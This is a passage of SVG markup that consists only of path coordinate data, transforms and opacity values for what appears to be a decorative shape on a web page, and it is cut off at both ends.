d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,